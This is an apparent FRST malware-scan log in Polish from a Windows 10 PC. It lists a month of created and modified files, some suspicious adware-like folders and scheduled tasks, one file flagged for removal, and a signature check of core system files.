2017-06-15 00:40 - 2017-06-15 00:41 - 06919904 _____ (AVAST Software) C:\Users\Public\Desktop\avast_free_antivirus_setup_online_b1f.exe
2017-06-15 00:40 - 2017-06-15 00:41 - 06919904 _____ (AVAST Software) C:\Users\Beata\Downloads\avast_free_antivirus_setup_online_b1f.exe
2017-06-14 20:39 - 2017-06-15 19:17 - 00038752 _____ (Microsoft Corporation) C:\Windows\system32\OOBEUpdater.exe
2017-06-14 20:39 - 2017-06-03 12:50 - 00315744 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2017-06-14 20:39 - 2017-06-03 12:50 - 00192856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aepic.dll
2017-06-14 20:39 - 2017-06-03 12:16 - 00279904 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2017-06-14 20:39 - 2017-06-03 12:14 - 01564512 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 01214816 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00629088 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00544096 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00379232 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00335712 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00334176 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00233824 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00136032 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00136024 _____ (Microsoft Corporation) C:\Windows\system32\ImplatSetup.dll
2017-06-14 20:39 - 2017-06-03 12:14 - 00096608 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-06-14 20:39 - 2017-06-03 12:14 - 00034648 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2017-06-14 20:39 - 2017-06-03 12:11 - 01706488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-06-14 20:39 - 2017-06-03 12:11 - 00128864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tm.sys
2017-06-14 20:39 - 2017-06-03 12:09 - 02213760 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-06-14 20:39 - 2017-06-03 12:08 - 07783256 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-06-14 20:39 - 2017-06-03 12:06 - 02048496 _____ C:\Windows\SysWOW64\CoreUIComponents.dll
2017-06-14 20:39 - 2017-06-03 12:01 - 02681200 _____ C:\Windows\system32\CoreUIComponents.dll
2017-06-14 20:39 - 2017-06-03 11:59 - 01181024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2017-06-14 20:39 - 2017-06-03 11:59 - 00764392 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
2017-06-14 20:39 - 2017-06-03 11:59 - 00118112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2017-06-14 20:39 - 2017-06-03 11:58 - 00340832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-06-14 20:39 - 2017-06-03 11:55 - 00780640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
2017-06-14 20:39 - 2017-06-03 11:54 - 00187232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2017-06-14 20:39 - 2017-06-03 11:53 - 00404824 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-06-14 20:39 - 2017-06-03 11:52 - 01021784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2017-06-14 20:39 - 2017-06-03 11:52 - 00607072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupEngine.dll
2017-06-14 20:39 - 2017-06-03 11:52 - 00111968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupApi.dll
2017-06-14 20:39 - 2017-06-03 11:51 - 02187104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-06-14 20:39 - 2017-06-03 11:51 - 00402272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-06-14 20:39 - 2017-06-03 11:50 - 00857440 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
2017-06-14 20:39 - 2017-06-03 11:50 - 00381792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2017-06-14 20:39 - 2017-06-03 11:49 - 20967840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2017-06-14 20:39 - 2017-06-03 11:49 - 00624048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2017-06-14 20:39 - 2017-06-03 11:49 - 00509280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2017-06-14 20:39 - 2017-06-03 11:48 - 01112416 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2017-06-14 20:39 - 2017-06-03 11:48 - 01100128 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2017-06-14 20:39 - 2017-06-03 11:48 - 00989024 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2017-06-14 20:39 - 2017-06-03 11:48 - 00857952 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupEngine.dll
2017-06-14 20:39 - 2017-06-03 11:48 - 00148832 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupApi.dll
2017-06-14 20:39 - 2017-06-03 11:45 - 22220864 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2017-06-14 20:39 - 2017-06-03 11:44 - 01600624 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2017-06-14 20:39 - 2017-06-03 11:44 - 01412640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll
2017-06-14 20:39 - 2017-06-03 11:44 - 00545944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2017-06-14 20:39 - 2017-06-03 11:40 - 01566552 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll
2017-06-14 20:39 - 2017-06-03 11:40 - 00628552 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2017-06-14 20:39 - 2017-06-03 11:39 - 05686272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2017-06-14 20:39 - 2017-06-03 11:39 - 02532192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2017-06-14 20:39 - 2017-06-03 11:39 - 00455520 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe
2017-06-14 20:39 - 2017-06-03 11:33 - 00095232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
2017-06-14 20:39 - 2017-06-03 11:32 - 00002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2017-06-14 20:39 - 2017-06-03 11:31 - 00224256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExSMime.dll
2017-06-14 20:39 - 2017-06-03 11:31 - 00037376 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2017-06-14 20:39 - 2017-06-03 11:28 - 00285184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.BlockedShutdown.dll
2017-06-14 20:39 - 2017-06-03 11:28 - 00232448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edputil.dll
2017-06-14 20:39 - 2017-06-03 11:26 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-06-14 20:39 - 2017-06-03 11:26 - 00100352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AuthBrokerUI.dll
2017-06-14 20:39 - 2017-06-03 11:23 - 00306688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieproxy.dll
2017-06-14 20:39 - 2017-06-03 11:22 - 07217152 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2017-06-14 20:39 - 2017-06-03 11:22 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupShim.dll
2017-06-14 20:39 - 2017-06-03 11:22 - 00327168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcorehc.dll
2017-06-14 20:39 - 2017-06-03 11:22 - 00181760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tcpipcfg.dll
2017-06-14 20:39 - 2017-06-03 11:20 - 00755712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-06-14 20:39 - 2017-06-03 11:19 - 01164288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certutil.exe
2017-06-14 20:39 - 2017-06-03 11:18 - 22569984 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2017-06-14 20:39 - 2017-06-03 11:16 - 00709120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2017-06-14 20:39 - 2017-06-03 11:16 - 00119808 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
2017-06-14 20:39 - 2017-06-03 11:16 - 00002560 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-06-14 20:39 - 2017-06-03 11:15 - 19414016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-06-14 20:39 - 2017-06-03 11:15 - 18364928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2017-06-14 20:39 - 2017-06-03 11:15 - 00886272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aadtb.dll
2017-06-14 20:39 - 2017-06-03 11:15 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\musdialoghandlers.dll
2017-06-14 20:39 - 2017-06-03 11:15 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BasicRender.sys
2017-06-14 20:39 - 2017-06-03 11:14 - 00238592 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2017-06-14 20:39 - 2017-06-03 11:14 - 00124416 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2017-06-14 20:39 - 2017-06-03 11:14 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2017-06-14 20:39 - 2017-06-03 11:14 - 00045056 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-06-14 20:39 - 2017-06-03 11:12 - 00027136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdProxy.dll
2017-06-14 20:39 - 2017-06-03 11:11 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\cloudAP.dll
2017-06-14 20:39 - 2017-06-03 11:10 - 00418304 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.BlockedShutdown.dll
2017-06-14 20:39 - 2017-06-03 11:10 - 00252928 _____ (Microsoft Corporation) C:\Windows\system32\edputil.dll
2017-06-14 20:39 - 2017-06-03 11:10 - 00117760 _____ (Microsoft Corporation) C:\Windows\system32\AuthBrokerUI.dll
2017-06-14 20:39 - 2017-06-03 11:09 - 00489472 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupShim.dll
2017-06-14 20:39 - 2017-06-03 11:09 - 00441344 _____ (Microsoft Corporation) C:\Windows\system32\netcorehc.dll
2017-06-14 20:39 - 2017-06-03 11:09 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\NetworkBindingEngineMigPlugin.dll
2017-06-14 20:39 - 2017-06-03 11:08 - 12187648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-06-14 20:39 - 2017-06-03 11:08 - 02643968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2017-06-14 20:39 - 2017-06-03 11:08 - 01221120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Audio.dll
2017-06-14 20:39 - 2017-06-03 11:08 - 00691200 _____ (Microsoft Corporation) C:\Windows\system32\ieproxy.dll
2017-06-14 20:39 - 2017-06-03 11:08 - 00324608 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.LockScreen.dll
2017-06-14 20:39 - 2017-06-03 11:08 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-06-14 20:39 - 2017-06-03 11:07 - 00552960 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2017-06-14 20:39 - 2017-06-03 11:07 - 00456192 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2017-06-14 20:39 - 2017-06-03 11:07 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\HNetCfgClient.dll
2017-06-14 20:39 - 2017-06-03 11:06 - 03664384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-06-14 20:39 - 2017-06-03 11:06 - 00198144 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2017-06-14 20:39 - 2017-06-03 11:05 - 01883648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Logon.dll
2017-06-14 20:39 - 2017-06-03 11:05 - 00295424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hnetcfg.dll
2017-06-14 20:39 - 2017-06-03 11:04 - 06042624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2017-06-14 20:39 - 2017-06-03 11:04 - 02006528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-06-14 20:39 - 2017-06-03 11:04 - 00773120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2017-06-14 20:39 - 2017-06-03 11:03 - 01988096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2017-06-14 20:39 - 2017-06-03 11:03 - 00932864 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-06-14 20:39 - 2017-06-03 11:02 - 02997760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2017-06-14 20:39 - 2017-06-03 11:01 - 00856064 _____ (Microsoft Corporation) C:\Windows\system32\efscore.dll
2017-06-14 20:39 - 2017-06-03 11:00 - 23677440 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-06-14 20:39 - 2017-06-03 10:58 - 00064512 _____ (Microsoft Corporation) C:\Windows\system32\fdProxy.dll
2017-06-14 20:39 - 2017-06-03 10:56 - 13091840 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-06-14 20:39 - 2017-06-03 10:54 - 01217024 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Audio.dll
2017-06-14 20:39 - 2017-06-03 10:53 - 08125440 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2017-06-14 20:39 - 2017-06-03 10:52 - 03403264 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2017-06-14 20:39 - 2017-06-03 10:52 - 02510848 _____ (Microsoft Corporation) C:\Windows\system32\NetworkMobileSettings.dll
2017-06-14 20:39 - 2017-06-03 10:52 - 00975872 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-06-14 20:39 - 2017-06-03 10:52 - 00886784 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2017-06-14 20:39 - 2017-06-03 10:51 - 01418240 _____ (Microsoft Corporation) C:\Windows\system32\certutil.exe
2017-06-14 20:39 - 2017-06-03 10:51 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupSvc.dll
2017-06-14 20:39 - 2017-06-03 10:50 - 04744704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-06-14 20:39 - 2017-06-03 10:50 - 02538496 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2017-06-14 20:39 - 2017-06-03 10:49 - 03615744 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2017-06-14 20:39 - 2017-06-03 10:49 - 02691072 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Logon.dll
2017-06-14 20:39 - 2017-06-03 10:49 - 02475520 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-06-14 20:39 - 2017-06-03 10:49 - 02318848 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-06-14 20:39 - 2017-06-03 10:49 - 01845248 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-06-14 20:39 - 2017-06-03 10:49 - 01513472 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2017-06-14 20:39 - 2017-06-03 10:49 - 00903680 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2017-06-14 20:39 - 2017-06-03 10:49 - 00351744 _____ (Microsoft Corporation) C:\Windows\system32\hnetcfg.dll
2017-06-14 20:39 - 2017-06-03 10:48 - 01490432 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-06-14 20:39 - 2017-06-03 10:48 - 01131008 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2017-06-14 20:39 - 2017-06-03 10:48 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-06-14 20:39 - 2017-06-03 10:48 - 00391168 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2017-06-14 20:39 - 2017-06-03 10:46 - 01121280 _____ (Microsoft Corporation) C:\Windows\system32\aadtb.dll
2017-06-14 20:39 - 2017-06-03 10:40 - 00483840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
2017-06-14 20:39 - 2017-06-03 08:08 - 00080078 _____ C:\Windows\system32\normidna.nls
2017-06-14 20:39 - 2017-03-04 08:16 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\wpninprc.dll
2017-06-14 20:39 - 2016-09-07 06:53 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentActivation.dll
2017-06-14 20:38 - 2017-03-04 08:22 - 00822784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakradiag.dll
2017-06-14 20:38 - 2017-03-04 08:19 - 00635904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-06-14 20:38 - 2017-03-04 08:16 - 00368128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\puiobj.dll
2017-06-12 19:21 - 2017-06-12 19:21 - 00098485 _____ C:\Users\Beata\Downloads\RULES OF ACCOMMODATION – SUMME.pdf
2017-06-12 09:09 - 2017-06-12 09:09 - 03359753 _____ C:\Users\Beata\Downloads\drive-download-20170612T070921Z-001.zip
2017-06-11 14:03 - 2017-06-11 14:03 - 00026030 _____ C:\Users\Beata\Downloads\wzf17_oceny_web (1).xlsx
2017-06-10 18:39 - 2017-06-17 00:12 - 00027023 _____ C:\Users\Beata\Desktop\praca dok.xlsx
2017-06-10 18:27 - 2017-06-10 18:27 - 00027951 _____ C:\Users\Beata\Downloads\SIC-przykład-Kopia.xlsx
2017-06-10 18:25 - 2017-06-10 18:25 - 00024919 _____ C:\Users\Beata\Downloads\praca (3).tex
2017-06-10 15:00 - 2017-06-10 15:00 - 00586898 _____ C:\Users\Beata\Downloads\eticket.pdf
2017-06-09 14:49 - 2017-06-09 14:49 - 00024318 _____ C:\Users\Beata\Desktop\przykl.xlsx
2017-06-08 14:47 - 2017-06-08 14:47 - 00024637 _____ C:\Users\Beata\Downloads\praca 1.tex
2017-06-08 11:54 - 2017-06-08 11:54 - 00024799 _____ C:\Users\Beata\Downloads\praca (2).tex
2017-06-08 11:08 - 2017-06-08 11:08 - 00473600 _____ C:\Users\Beata\Downloads\Stat4 (1).pps
2017-06-08 10:49 - 2017-06-08 10:49 - 00061304 _____ () C:\Windows\system32\Drivers\lpsport.sys
2017-06-08 10:23 - 2017-06-08 10:23 - 00024364 _____ C:\Users\Beata\Downloads\praca (1).tex
2017-06-06 21:58 - 2017-06-06 21:58 - 00473600 _____ C:\Users\Beata\Downloads\Stat4.pps
2017-06-05 14:49 - 2017-06-05 14:49 - 00450887 _____ C:\Users\Beata\Downloads\Wyklad_3_2015.pptx
2017-06-05 12:49 - 2017-06-13 11:06 - 00000000 ____D C:\Users\Beata\Desktop\praca
2017-06-05 11:44 - 2017-06-05 11:44 - 00026030 _____ C:\Users\Beata\Downloads\wzf17_oceny_web.xlsx
2017-06-01 14:07 - 2017-06-01 14:07 - 01543810 _____ C:\Users\Beata\Downloads\drive-download-20170601T120745Z-001.zip
2017-05-31 14:01 - 2017-05-31 14:01 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-31 13:59 - 2017-06-19 00:33 - 00000000 ____D C:\Users\Beata\AppData\Local\terana
2017-05-29 16:53 - 2017-05-29 16:53 - 00158754 _____ C:\Users\Beata\Downloads\cv-beata-klich.pdf
2017-05-29 16:15 - 2017-06-13 10:55 - 00000000 ____D C:\Users\Beata\Desktop\finanse-płyta
2017-05-29 14:17 - 2017-05-29 15:35 - 1223770946 _____ C:\Users\Beata\Downloads\plytki Dzieża.rar
2017-05-27 19:38 - 2017-05-27 19:38 - 02801384 _____ C:\Users\Beata\Downloads\gryegz.zip
2017-05-26 00:29 - 2017-05-26 00:29 - 00000000 _____ C:\Windows\system32\GfxValDisplayLog.bin
2017-05-24 16:41 - 2017-05-24 16:41 - 00000000 _____ C:\Windows\SysWOW64\55
2017-05-24 16:41 - 2017-05-24 16:41 - 00000000 _____ C:\Windows\SysWOW64\33
2017-05-24 14:01 - 2017-06-15 15:43 - 00001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-05-24 00:23 - 2017-05-24 00:23 - 00000000 _____ C:\Windows\SysWOW64\1
2017-05-21 21:46 - 2017-05-21 21:46 - 00102370 _____ C:\Users\Beata\Downloads\EI.pdf
2017-05-20 19:24 - 2017-05-20 19:24 - 01433907 _____ C:\Users\Beata\Downloads\26-100-1-PB.pdf
2017-05-20 19:24 - 2017-05-20 19:24 - 00464037 _____ C:\Users\Beata\Downloads\701-1662-2-PB.pdf
 
==================== Jeden miesiąc - zmodyfikowane pliki i foldery ========
 
(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
 
2017-06-19 16:10 - 2017-04-19 23:50 - 00000368 _____ C:\Users\Public\Documents\temp.dat
2017-06-19 16:09 - 2017-04-19 23:52 - 00000000 ____D C:\Users\Beata\AppData\LocalLow\Mozilla
2017-06-19 16:09 - 2016-10-16 13:16 - 00000000 __SHD C:\Users\Beata\IntelGraphicsProfiles
2017-06-19 16:09 - 2016-10-16 13:15 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-19 00:39 - 2016-10-16 13:09 - 03383108 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-19 00:39 - 2016-07-17 00:05 - 01470814 _____ C:\Windows\system32\perfh015.dat
2017-06-19 00:39 - 2016-07-17 00:05 - 00375758 _____ C:\Windows\system32\perfc015.dat
2017-06-19 00:33 - 2016-10-16 13:01 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-19 00:12 - 2016-07-16 08:04 - 00262144 _____ C:\Windows\system32\config\BBI
2017-06-19 00:09 - 2016-07-16 13:36 - 00000000 ____D C:\Windows\CbsTemp
2017-06-19 00:08 - 2017-05-01 21:18 - 00000000 ____D C:\Users\Beata\AppData\Roaming\Google
2017-06-19 00:08 - 2016-10-16 18:55 - 00000000 ____D C:\Users\Beata\AppData\Local\Google
2017-06-18 23:55 - 2016-10-16 13:49 - 00000000 ____D C:\Windows\Panther
2017-06-18 23:55 - 2016-10-16 13:11 - 00000000 ____D C:\Users\Beata\AppData\Local\PDFCreator
2017-06-18 23:55 - 2016-10-16 13:10 - 00000000 ____D C:\Program Files\PDFCreator
2017-06-18 23:55 - 2016-07-16 13:45 - 00000000 ____D C:\Windows\INF
2017-06-18 23:40 - 2016-10-16 13:01 - 00000000 ____D C:\Windows\system32\SleepStudy
2017-06-18 20:44 - 2016-11-01 19:30 - 00000000 ____D C:\Users\Beata\Desktop\seminarium
2017-06-18 20:29 - 2017-02-14 12:07 - 00000000 ____D C:\Users\Beata\Desktop\LICENCJAT
2017-06-18 18:53 - 2016-10-16 13:10 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-06-18 18:50 - 2016-07-16 13:47 - 00000000 ____D C:\Windows\AppReadiness
2017-06-16 23:50 - 2016-07-16 13:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-06-16 23:42 - 2016-07-16 13:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-06-15 19:18 - 2016-10-16 13:01 - 00343584 _____ C:\Windows\system32\FNTCACHE.DAT
2017-06-15 19:17 - 2016-07-16 13:47 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2017-06-15 19:17 - 2016-07-16 13:47 - 00000000 ____D C:\Windows\system32\appraiser
2017-06-15 19:17 - 2016-07-16 13:47 - 00000000 ____D C:\Windows\ShellExperiences
2017-06-15 19:13 - 2016-07-16 13:47 - 00000000 ____D C:\Windows\rescache
2017-06-15 15:43 - 2017-04-19 23:52 - 00000000 ____D C:\Users\Beata\AppData\Roaming\Mozilla
2017-06-15 00:11 - 2016-07-16 13:47 - 00000000 ____D C:\Windows\registration
2017-06-14 23:54 - 2016-10-16 13:10 - 00001139 _____ C:\Users\Public\Desktop\VLC media player.lnk
2017-06-14 23:38 - 2016-10-16 13:04 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-06-14 22:05 - 2017-05-15 11:51 - 00000000 ____D C:\Users\Beata\AppData\Local\CWASRE
2017-06-14 22:05 - 2017-05-05 13:53 - 00000000 ____D C:\Users\Beata\AppData\Local\WANARE
2017-06-14 22:05 - 2017-05-02 14:03 - 00000000 ____D C:\Users\Beata\AppData\Roaming\WinSAPSvc
2017-06-14 20:51 - 2016-10-18 16:12 - 00000000 ____D C:\Windows\system32\MRT
2017-06-14 20:48 - 2016-10-18 16:12 - 133627792 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-06-13 11:07 - 2017-05-17 09:12 - 00000000 ____D C:\Users\Beata\Desktop\finanse
2017-06-11 15:00 - 2016-10-16 13:04 - 00000000 ____D C:\Users\Beata\AppData\Local\Packages
2017-06-08 10:57 - 2017-02-15 19:46 - 00004090 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1487180761
2017-06-08 10:57 - 2017-02-15 19:46 - 00001088 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-06-08 10:38 - 2017-05-05 13:54 - 00000000 ____D C:\Users\Beata\AppData\Local\background_fault
2017-06-07 00:07 - 2017-04-19 23:50 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-06-05 12:52 - 2017-02-15 19:16 - 00000000 ____D C:\Users\Beata\Desktop\3 ROK
2017-06-03 08:36 - 2016-07-16 13:49 - 00835576 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-06-03 08:36 - 2016-07-16 13:49 - 00177656 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-06-02 20:08 - 2017-05-02 14:03 - 00003680 _____ C:\Windows\System32\Tasks\Milimili
2017-05-26 00:29 - 2016-10-16 13:15 - 00000200 _____ C:\Windows\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-05-25 00:11 - 2017-05-12 13:46 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-24 16:40 - 2017-05-12 14:11 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-24 16:40 - 2017-04-25 16:24 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-24 16:40 - 2017-04-19 23:45 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-05-24 14:01 - 2017-05-02 14:03 - 00000000 ____D C:\Users\Beata\AppData\Local\SNARE
 
==================== Pliki w katalogu głównym wybranych folderów =======
 
2016-10-16 13:09 - 2016-10-16 13:09 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
 
Pliki do przeniesienia lub usunięcia:
====================
C:\Users\Beata\AppData\Local\background_fault\aswRD.exe
 
 
==================== Bamital & volsnap ======================
 
(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)
 
C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo
C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo
C:\Windows\explorer.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\explorer.exe => Plik podpisany cyfrowo
C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\svchost.exe => Plik podpisany cyfrowo
C:\Windows\system32\services.exe => Plik podpisany cyfrowo
C:\Windows\system32\User32.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\User32.dll => Plik podpisany cyfrowo
C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\userinit.exe => Plik podpisany cyfrowo
C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo
C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo
 
LastRegBack: 2017-06-15 16:03
 
